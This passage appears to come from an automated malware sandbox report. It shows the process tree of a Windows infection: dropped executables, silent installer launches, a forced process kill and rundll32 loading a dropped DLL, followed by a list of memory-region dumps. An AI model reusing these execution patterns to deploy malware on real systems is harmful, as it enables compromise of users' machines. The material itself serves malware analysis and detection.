                                                                                                                                            • C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                              msiexec -Y .\Xw5LDH.~Rl
                                                                                                                                              10⤵
                                                                                                                                                PID:5904
                                                                                                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                          taskkill /f /iM "8115156.exe"
                                                                                                                                          7⤵
                                                                                                                                          • Kills process with taskkill
                                                                                                                                          PID:5208
                                                                                                                                  • C:\Users\Admin\AppData\Roaming\3860801.exe
                                                                                                                                    "C:\Users\Admin\AppData\Roaming\3860801.exe"
                                                                                                                                    4⤵
                                                                                                                                      PID:2128
                                                                                                                                  • C:\Users\Admin\AppData\Roaming\8320134.exe
                                                                                                                                    "C:\Users\Admin\AppData\Roaming\8320134.exe"
                                                                                                                                    3⤵
                                                                                                                                      PID:4460
                                                                                                                                  • C:\Users\Admin\Pictures\Adobe Films\6uHEVhTPtit6lTxg8fV0eD2N.exe
                                                                                                                                    "C:\Users\Admin\Pictures\Adobe Films\6uHEVhTPtit6lTxg8fV0eD2N.exe"
                                                                                                                                    2⤵
                                                                                                                                    • Executes dropped EXE
                                                                                                                                    PID:1912
                                                                                                                                  • C:\Users\Admin\Pictures\Adobe Films\9WIJtxlsgOIp2HQf2t6RZdoY.exe
                                                                                                                                    "C:\Users\Admin\Pictures\Adobe Films\9WIJtxlsgOIp2HQf2t6RZdoY.exe"
                                                                                                                                    2⤵
                                                                                                                                    • Executes dropped EXE
                                                                                                                                    PID:2324
                                                                                                                                  • C:\Users\Admin\Pictures\Adobe Films\YlM8f8ZYF7ZBWfH06sVqXVME.exe
                                                                                                                                    "C:\Users\Admin\Pictures\Adobe Films\YlM8f8ZYF7ZBWfH06sVqXVME.exe"
                                                                                                                                    2⤵
                                                                                                                                    • Executes dropped EXE
                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                    PID:1392
                                                                                                                                  • C:\Users\Admin\Pictures\Adobe Films\gVf6IXUmOOirYKM8eOhB0zv0.exe
                                                                                                                                    "C:\Users\Admin\Pictures\Adobe Films\gVf6IXUmOOirYKM8eOhB0zv0.exe"
                                                                                                                                    2⤵
                                                                                                                                    • Executes dropped EXE
                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                    PID:3796
                                                                                                                                  • C:\Users\Admin\Pictures\Adobe Films\QNyE0BtC_KBk23BTZGqAjwbR.exe
                                                                                                                                    "C:\Users\Admin\Pictures\Adobe Films\QNyE0BtC_KBk23BTZGqAjwbR.exe"
                                                                                                                                    2⤵
                                                                                                                                      PID:4800
                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\is-UL603.tmp\QNyE0BtC_KBk23BTZGqAjwbR.tmp
                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\is-UL603.tmp\QNyE0BtC_KBk23BTZGqAjwbR.tmp" /SL5="$501F6,506127,422400,C:\Users\Admin\Pictures\Adobe Films\QNyE0BtC_KBk23BTZGqAjwbR.exe"
                                                                                                                                        3⤵
                                                                                                                                          PID:4920
                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\is-6AJI6.tmp\lakazet.exe
                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\is-6AJI6.tmp\lakazet.exe" /S /UID=2709
                                                                                                                                            4⤵
                                                                                                                                              PID:4848
                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\01-9f277-76c-738a7-d05807033e9e2\Rucudeshaepu.exe
                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\01-9f277-76c-738a7-d05807033e9e2\Rucudeshaepu.exe"
                                                                                                                                                5⤵
                                                                                                                                                  PID:5772
                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\ff-73ebf-412-599ac-8bd67f0ae246d\Jelelicaenu.exe
                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\ff-73ebf-412-599ac-8bd67f0ae246d\Jelelicaenu.exe"
                                                                                                                                                  5⤵
                                                                                                                                                    PID:5912
                                                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\qvnbwjiv.yi5\Install1.exe & exit
                                                                                                                                                      6⤵
                                                                                                                                                        PID:4960
                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\qvnbwjiv.yi5\Install1.exe
                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\qvnbwjiv.yi5\Install1.exe
                                                                                                                                                          7⤵
                                                                                                                                                            PID:6876
                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\Install1.exe
                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\Install1.exe
                                                                                                                                                              8⤵
                                                                                                                                                                PID:6048
                                                                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                                                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\qklvakcm.ldh\vinmall_da.exe /silent & exit
                                                                                                                                                            6⤵
                                                                                                                                                              PID:6812
                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\qklvakcm.ldh\vinmall_da.exe
                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\qklvakcm.ldh\vinmall_da.exe /silent
                                                                                                                                                                7⤵
                                                                                                                                                                  PID:2056
                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\XWIJVGMLGG\foldershare.exe
                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\XWIJVGMLGG\foldershare.exe" /VERYSILENT
                                                                                                                                                              5⤵
                                                                                                                                                                PID:6084
                                                                                                                                                      • C:\Windows\system32\rundll32.exe
                                                                                                                                                        rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                        1⤵
                                                                                                                                                        • Process spawned unexpected child process
                                                                                                                                                        PID:6796
                                                                                                                                                        • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                          rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                          2⤵
                                                                                                                                                            PID:6828
                                                                                                                                                        • C:\Windows\system32\svchost.exe
                                                                                                                                                          C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                                                                          1⤵
                                                                                                                                                            PID:7012
                                                                                                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                                            1⤵
                                                                                                                                                              PID:3064
                                                                                                                                                            • C:\Windows\system32\browser_broker.exe
                                                                                                                                                              C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                                              1⤵
                                                                                                                                                                PID:7492
                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\84F6.exe
                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\84F6.exe
                                                                                                                                                                1⤵
                                                                                                                                                                  PID:8020
                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Smart Clock\SmartClock.exe
                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\Smart Clock\SmartClock.exe"
                                                                                                                                                                    2⤵
                                                                                                                                                                      PID:6248
                                                                                                                                                                  • C:\Windows\system32\msiexec.exe
                                                                                                                                                                    C:\Windows\system32\msiexec.exe /V
                                                                                                                                                                    1⤵
                                                                                                                                                                      PID:1112
                                                                                                                                                                      • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                        C:\Windows\syswow64\MsiExec.exe -Embedding DBD607D2C4D439583F58E73FC9DE3D1A C
                                                                                                                                                                        2⤵
                                                                                                                                                                          PID:7076
                                                                                                                                                                      • C:\Windows\system32\rundll32.exe
                                                                                                                                                                        rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                        1⤵
                                                                                                                                                                        • Process spawned unexpected child process
                                                                                                                                                                        PID:6392
                                                                                                                                                                        • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                          rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                          2⤵
                                                                                                                                                                            PID:7172
                                                                                                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                          1⤵
                                                                                                                                                                            PID:5548

                                                                                                                                                                          Network

                                                                                                                                                                                MITRE ATT&CK Enterprise v6

                                                                                                                                                                                Downloads


                                                                                                                                                                                  Filesize

                                                                                                                                                                                  696KB

                                                                                                                                                                                • memory/1740-349-0x0000000000400000-0x0000000002B64000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  39.4MB

                                                                                                                                                                                • memory/1912-272-0x0000000002EC0000-0x00000000032CF000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  4.1MB

                                                                                                                                                                                • memory/1912-275-0x00000000032D0000-0x0000000003B72000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  8.6MB

                                                                                                                                                                                • memory/1912-277-0x0000000000400000-0x0000000000CBD000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  8.7MB

                                                                                                                                                                                • memory/2052-286-0x00000000004E0000-0x000000000062A000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  1.3MB

                                                                                                                                                                                • memory/2052-299-0x0000000002170000-0x0000000002245000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  852KB

                                                                                                                                                                                • memory/2052-300-0x0000000000400000-0x00000000004D8000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  864KB

                                                                                                                                                                                • memory/2324-256-0x0000000002464000-0x0000000002466000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  8KB

                                                                                                                                                                                • memory/2324-224-0x0000000002400000-0x000000000242E000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  184KB

                                                                                                                                                                                • memory/2324-297-0x0000000000400000-0x0000000000452000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  328KB

                                                                                                                                                                                • memory/2324-217-0x0000000000460000-0x000000000050E000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  696KB

                                                                                                                                                                                • memory/2324-226-0x0000000002460000-0x0000000002461000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  4KB

                                                                                                                                                                                • memory/2324-230-0x0000000002462000-0x0000000002463000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  4KB

                                                                                                                                                                                • memory/2324-305-0x0000000002463000-0x0000000002464000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  4KB

                                                                                                                                                                                • memory/2324-231-0x0000000002430000-0x000000000245C000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  176KB

                                                                                                                                                                                • memory/2324-294-0x0000000000530000-0x000000000067A000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  1.3MB

                                                                                                                                                                                • memory/2468-118-0x0000000003C60000-0x0000000003DAC000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  1.3MB

                                                                                                                                                                                • memory/2592-268-0x0000000001F90000-0x0000000001FC9000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  228KB

                                                                                                                                                                                • memory/2592-280-0x0000000004BC0000-0x0000000004BC1000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  4KB

                                                                                                                                                                                • memory/2592-282-0x0000000004BC3000-0x0000000004BC4000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  4KB

                                                                                                                                                                                • memory/2592-251-0x0000000004B30000-0x0000000004B31000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  4KB

                                                                                                                                                                                • memory/2592-200-0x0000000002220000-0x000000000224D000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  180KB

                                                                                                                                                                                • memory/2592-210-0x0000000004BC2000-0x0000000004BC3000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  4KB

                                                                                                                                                                                • memory/2592-196-0x0000000000460000-0x000000000050E000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  696KB

                                                                                                                                                                                • memory/2592-213-0x00000000023D0000-0x00000000023FC000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  176KB

                                                                                                                                                                                • memory/2592-257-0x0000000004BC4000-0x0000000004BC6000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  8KB

                                                                                                                                                                                • memory/2592-270-0x0000000000400000-0x0000000000452000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  328KB

                                                                                                                                                                                • memory/2880-194-0x0000000005680000-0x0000000005681000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  4KB

                                                                                                                                                                                • memory/2880-191-0x0000000005540000-0x0000000005541000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  4KB

                                                                                                                                                                                • memory/2880-189-0x0000000005580000-0x0000000005581000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  4KB

                                                                                                                                                                                • memory/2880-184-0x0000000000D70000-0x0000000000D71000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  4KB

                                                                                                                                                                                • memory/2888-285-0x0000000004E40000-0x0000000004E41000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  4KB

                                                                                                                                                                                • memory/2888-185-0x0000000000520000-0x0000000000521000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  4KB

                                                                                                                                                                                • memory/2888-193-0x0000000004E10000-0x0000000004E37000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  156KB

                                                                                                                                                                                • memory/3040-273-0x0000000002560000-0x0000000002576000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  88KB

                                                                                                                                                                                • memory/3108-289-0x0000000000440000-0x000000000058A000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  1.3MB

                                                                                                                                                                                • memory/3108-287-0x00000000001E0000-0x00000000001F0000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  64KB

                                                                                                                                                                                • memory/3388-301-0x0000000000030000-0x0000000000033000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  12KB

                                                                                                                                                                                • memory/3704-233-0x0000000000430000-0x000000000057A000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  1.3MB

                                                                                                                                                                                • memory/3704-203-0x0000000000430000-0x000000000057A000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  1.3MB

                                                                                                                                                                                • memory/3736-295-0x0000000000400000-0x000000000040B000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  44KB

                                                                                                                                                                                • memory/3736-313-0x0000000000400000-0x000000000040B000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  44KB

                                                                                                                                                                                • memory/3796-281-0x0000000004DB0000-0x0000000004DB1000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  4KB

                                                                                                                                                                                • memory/3796-190-0x0000000004D60000-0x0000000004D7C000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  112KB

                                                                                                                                                                                • memory/3796-311-0x0000000000E80000-0x0000000000E9B000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  108KB
